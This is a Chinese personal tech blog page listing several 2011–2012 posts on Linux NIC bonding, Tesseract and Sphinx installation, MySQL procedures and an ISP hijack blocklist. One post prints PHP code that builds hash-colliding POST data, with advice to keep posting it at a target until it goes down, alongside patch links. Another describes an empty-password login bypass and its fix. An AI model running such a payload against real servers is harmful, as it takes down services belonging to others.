Linux多网卡负载均衡 : bond

On 01/19/2012, in linux, by kilobug

一、新建bond0虚拟设备

vi /etc/sysconfig/network-scripts/ifcfg-bond0

输入

DEVICE=bond0
BOOTPROTO=none
ONBOOT=yes
NETWORK=192.168.1.0 #网段
NETMASK=255.255.255.0 # 掩码
IPADDR=192.168.1.2 # 指定IP
USERCTL=no
GATEWAY=192.168.1.1 # 网关
TYPE=Ethernet

二、修改所有真实网卡的配置

vi /etc/sysconfig/network-scripts/ifcfg-eth0
vi /etc/sysconfig/network-scripts/ifcfg-eth1
....

内容修改为:

DEVICE=eth0 # 这里填写对应的设备名称
BOOTPROTO=none
ONBOOT=yes
MASTER=bond0
SLAVE=yes
USERCTL=yes

三、将bond0加入modprobe

vi /etc/modprobe.conf

加入

alias bond0 bonding
options bond0 miimon=100 mode=0

四、加入启动命令

vi /etc/rc.d/rc.local

加入

ifenslave bond0 eth0 eth1

其中eth0、eth1为真实网卡名称,按照实际情况填写

五、重启系统后即可启动负载均衡式的bond

第三步选项说明:
miimon=100
每100毫秒 (即0.1秒) 检查一次网络

mode=0
共有七种模式,常用的模式是0和1
mode=0 : 负载均衡模式,所有网卡一起使用,峰值=所有网卡带宽的总和,当某个网卡故障,仅降低带宽,不影响其他网卡
mode=1 : 热备模式,即一块网卡运行,其他待命,当运行的网卡故障,其他网卡顶上

mode英文解释:

mode=1(active-backup) Active-backup policy: Only one slave in the bond is active. A different slave becomes active if, and only if, the active slave fails. The bond's MAC address is externally visible on only one port (network adapter) to avoid confusing the switch. This mode provides fault tolerance. The primary option affects the behavior of this mode.
 
 
mode=2 (balance-xor) XOR policy: Transmit based on [(source MAC address XOR'd with destination MAC address) modulo slave count]. This selects the same slave for each destination MAC address. This mode provides load balancing and fault tolerance.
 
 
mode=3(broadcast) Broadcast policy: transmits everything on all slave interfaces. This mode provides fault tolerance.
 
 
mode=4(802.3ad) IEEE 802.3ad Dynamic link aggregation.
 
 
mode=5(balance-tlb) Adaptive transmit load balancing: channel bonding that does not require any special switch support. The outgoing traffic is distributed according to the current load (computed relative to the speed) on each slave. Incoming traffic is received by the current slave. If the receiving slave fails, another slave takes over the MAC address of the failed receiving slave. Prerequisite: Ethtool support in the base drivers for retrieving the speed of each slave.
 
 
mode=6(balance-alb) Adaptive load balancing: includes balance-tlb plus receive load balancing (rlb) for IPV4 traffic, and does not require any special switch support. The receive load balancing is achieved by ARP negotiation. The bonding driver intercepts the ARP Replies sent by the local system on their way out and overwrites the source hardware address with the unique hardware address of one of the slaves in the bond such that different peers use different hardware addresses for the server.

查看bond0状态:

cat /proc/net/bonding/bond0

若某个网卡的MII Status=down,表示该网卡无法连接网络
此时应检查:
1、网线是否插好
2、网线是否损坏
3、网卡配置是否正确
4、网卡是否没插好
5、网卡是否损坏

PS: 使用bond时,所有网卡接口都需用网线接上交换机和路由器

0 Comments
Leave A Response

 

Tesseract OCR 3.0 安装记录

On 01/11/2012, in linux, by kilobug

下载:
1、安装包:Tesseract-3.01.tar.gz
2、语言包:Eng.traineddata.gz(这个是英文语言包)
3、图像分析库:Leptonica-1.68.tar.gz(版本必须>=1.67)

Ubuntu:

sudo apt-get install autoconf automake libtool
sudo apt-get install libpng12-dev
sudo apt-get install libjpeg62-dev
sudo apt-get install libtiff4-dev
sudo apt-get install zlib1g-dev

CentOS:

yum install gcc gcc-c++ autoconf automake libtool libpng libjpeg libtiff zlib-devel

解压Leptonica-1.68.tar.gz并进入目录:

./configure && make && make install
ln -s /usr/local/lib/liblept.* /usr/lib/
ln -s /usr/local/lib/liblept.* /usr/lib32/
ln -s /usr/local/lib/liblept.* /usr/lib64/
ln -s /usr/local/lib/liblept.* /lib/
ln -s /usr/local/lib/liblept.* /lib32/
ln -s /usr/local/lib/liblept.* /lib64/

解压Tesseract-3.01.tar.gz并进入目录
删除ccutil/strngs.h第一行第一个字符
执行以下操作:

sh autogen.sh
CPPFLAGS="-I/usr/local/include" LDFLAGS="-L/usr/local/lib" ./configure
make && make install
ln -s /usr/local/lib/libtesseract.* /usr/lib/
ln -s /usr/local/lib/libtesseract.* /usr/lib32/
ln -s /usr/local/lib/libtesseract.* /usr/lib64/
ln -s /usr/local/lib/libtesseract.* /lib/
ln -s /usr/local/lib/libtesseract.* /lib32/
ln -s /usr/local/lib/libtesseract.* /lib64/

解压Eng.traineddata.gz并拷贝到/usr/local/share/tessdata/目录下

gzip -d eng.traineddata.gz
cp eng.traineddata /usr/local/share/tessdata/

End.

PS:容易把数字解析成字母,如数字2=字母Z,数字0=字母o等

0 Comments
Leave A Response

 

HASH DDOS: 秒杀绝大部分动态语言的拒绝服务攻击

On 12/31/2011, in php, by kilobug

http://www.laruence.com/2011/12/29/2412.html这篇文章中描述了这个bug
原文地址:http://www.ocert.org/advisories/ocert-2011-003.html

秒杀绝大部分的动态语言,只需一部普通PC,可以跑死N台高配服务器

Hash DDOS实例代码:

$size = pow(2, 14); // 16 is just an example, could also be 15 or 17
 
$genpost = "";
$len = 0;
$array = array();
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
	$genpost .= ($genpost ? "&"  : "").$key."=1";
}
 
$len = strlen($genpost);
$data = "POST 文件路径 HTTP/1.1
Host: 域名或IP
Content-Type: application/x-www-form-urlencoded
Content-Length: {$len}
Connection: Close
".$genpost;

只需不停的将变量$data的值post到目标网址,目标服务器的CPU就会飙升,直到宕机…
php5.2可以打这个patch:
https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars

php5.3必须升级到5.3.9,否则只能自己动手移植5.2的patch

0 Comments
Leave A Response

 

mysql存储过程小结

On 12/11/2011, in mysql, by kilobug

由于我希望sphinx能把单表的数据分成多个索引以提升多核性能
需要计算出某表的N分之X的最小最大ID,稍微学习了mysql存储过程
以下为实现SQL:

DELIMITER //
CREATE PROCEDURE `sph_distribute`(IN `tabname` VARCHAR(50), IN `idname` VARCHAR(50), IN `num` INT, IN `pos` INT)
BEGIN
	SET @SQL = CONCAT('SELECT CEIL(COUNT(*)/', num, ')+0 INTO @step FROM `', tabname, '`');
	PREPARE stmt1 FROM @SQL;
	EXECUTE stmt1;
	DEALLOCATE PREPARE stmt1;
 
	SET @SQL = CONCAT('SELECT `', idname, '` INTO @minid FROM `', tabname, '` ORDER BY `', idname, '` ASC LIMIT ', FLOOR((pos - 1) * @step), ',1');
	PREPARE stmt1 FROM @SQL;
	EXECUTE stmt1;
	DEALLOCATE PREPARE stmt1;
 
	IF pos = num THEN
		SET @SQL = CONCAT('SELECT MAX(`', idname, '`) INTO @maxid FROM `', tabname, '`');
		PREPARE stmt1 FROM @SQL;
		EXECUTE stmt1;
		DEALLOCATE PREPARE stmt1;
	ELSE
		SET @SQL = CONCAT('SELECT `', idname, '` INTO @maxid FROM `', tabname, '` ORDER BY `', idname, '` ASC LIMIT ', FLOOR(pos * @step - 1), ',1');
		PREPARE stmt1 FROM @SQL;
		EXECUTE stmt1;
		DEALLOCATE PREPARE stmt1;
	END IF;
 
	SELECT @minid, @maxid, @step;
END;//
DELIMITER ;

调用:

CALL sph_distribute('表名', 'id字段名', 分成多少份, 第几份);

例子:

CALL sph_distribute('table', 'id', 5, 3);

一些MYSQL不常见的写法:
1、DELIMITER,用于定义SQL结束符号;
2、SELECT …… \G,将每个字段一行显示;
3、PROCEDURE中,变量当表名只能用PREPAGE处理,里面的赋值变量,只支持全局变量(即 @var)
4、对整数的变量整乘,会自动转换为浮点,这点我很蛋疼,可以用FLOOR再转成整数

0 Comments
Leave A Response

 

狗日的电信114

On 12/10/2011, in other, by kilobug

今天正happy的debug线上项目,点击某个站内链接,突然跳到114search.114so.cn去!!!

怒啊!!!又被电信这个流氓给劫持了!!!
加上chrome对301 header缓存了,于是这个链接就不停的访问114so.cn
在访问news.ifeng.com时也遇到这种破事

于是迅速将114的域名和对应IP加入路由黑名单,我狠一点,直接屏蔽网段

下面列出我屏蔽的114so.cn的域名和IP,我抽空会更新:

114.sh.vnet.cn
sh.vnet.cn
sh.114so.cn
search.114.vnet.cn
114.vnet.cn
114.search.tfol.com
114search.114so.cn
114so.cn
118114.cn
keyword.vnet.cn 
keyword.vnet.cn
vnet.cn
114.vnet.cn
61.139.8.100
218.30.64.193 - 218.30.64.199
220.165.8.172
116.228.55.33

前三个域名中的sh是上海的拼音首字母,不同地方可以更换对应的
这种方法不能彻底防御,只能被动防御,发现一个屏蔽一个

彻底的方式时使用国外安全的公共dns,例如google的:

8.8.8.8
8.8.4.4

但缺点是部分使用了cdn或多ip的站点,访问会很慢!!!

1 Comments
Leave A Response

 

新增功能时,发现严重bug!!!

On 12/04/2011, in php, by kilobug

在为购谷新增商户会员功能时,突然发现一个非常严重的bug,可以空密码登录账号!!!

会员模块设计时,我参考a1.cn和ucenter的会员设计,设计了

public function getUid($uid, $passwd = null) {
       ........
       if(is_string($passwd)) { /* 判定密码 */
              ........
       }
       ........
}

通过调用getUid方法来判定账号密码是否匹配

但!!!

if(is_string($passwd))

这个判定是有隐患的!
当编写业务逻辑的程序员没将$passwd参数转换为字符串,就调用getUid,会导致:
故意构造登录参数,只传username而不传password参数就能登录对应账号!

解决:

if(func_num_args() == 2)

PS:这个bug涉及了后台和会员登录,若被人利用会非常严重

0 Comments
Leave A Response

 

盛大云:云硬盘io性能垃圾中的垃圾

On 12/03/2011, in other, by kilobug

使用过程中,发现云硬盘io超级垃圾
两个云硬盘,一个300G,一个200G

拷贝一个10G的tar,颠峰值(低峰值只有十几KB):
300G: 读10m/s,写4m/s
200G: 读4m/s,写1m/s

这神马玩意?
200G写的还没我的宽带快….

买云主机带的硬盘的io性能还能接受:
读100m/s,写30m/s

PS:只能放常年不动的附件在云硬盘,放数据库不敢想象这种io性能有多卡…毫无意义的“安全的”云硬盘

2 Comments
Leave A Response

 

解决sphinx2.0.x建索引报错:”indexer: error while loading shared libraries: libiconv.so.2: cannot open shared object file: No such file or directory”

On 12/03/2011, in linux, by kilobug 
ln -s /usr/local/lib/libiconv.so.2 /usr/lib/libiconv.so.2

如果你是64bit系统,还得链到lib64

ln -s /usr/local/lib/libiconv.so.2 /usr/lib64/libiconv.so.2
0 Comments
Leave A Response

 

解决sphinx2.0.x安装报错:undefined reference to `libiconv_open`

On 12/02/2011, in linux, by kilobug 

./configure --prefix=/usr/local/sphinx/

打开源码目录/src/Makefile:

LIBS = -ldl -lm -lz -lexpat  -L/usr/local/lib -lrt  -lpthread

在尾部增加 -liconv

LIBS = -ldl -lm -lz -lexpat  -L/usr/local/lib -lrt  -lpthread  -liconv

最后执行make

make && make install

PS: 在帮koofind换服务器时,由于项目要求,将SphinxClient类改名,但会报一些warning错误,最后发现构造函数是SphinxClient,蛋疼,可能是为了兼容php4吧

0 Comments
Leave A Response

 

安装glibc 2.7

On 11/27/2011, in linux, by kilobug 
wget http://ftp.gnu.org/pub/gnu/glibc/glibc-2.7.tar.gz
tar zxvf glibc-2.7.tar.gz
#不能进glib-2.7目录编译,需要设置prefix=/usr
./glib-2.7/configure --prefix=/usr
make && make install
0 Comments
Leave A Response

 
Previous Entries

无觅相关文章插件,快速提升流量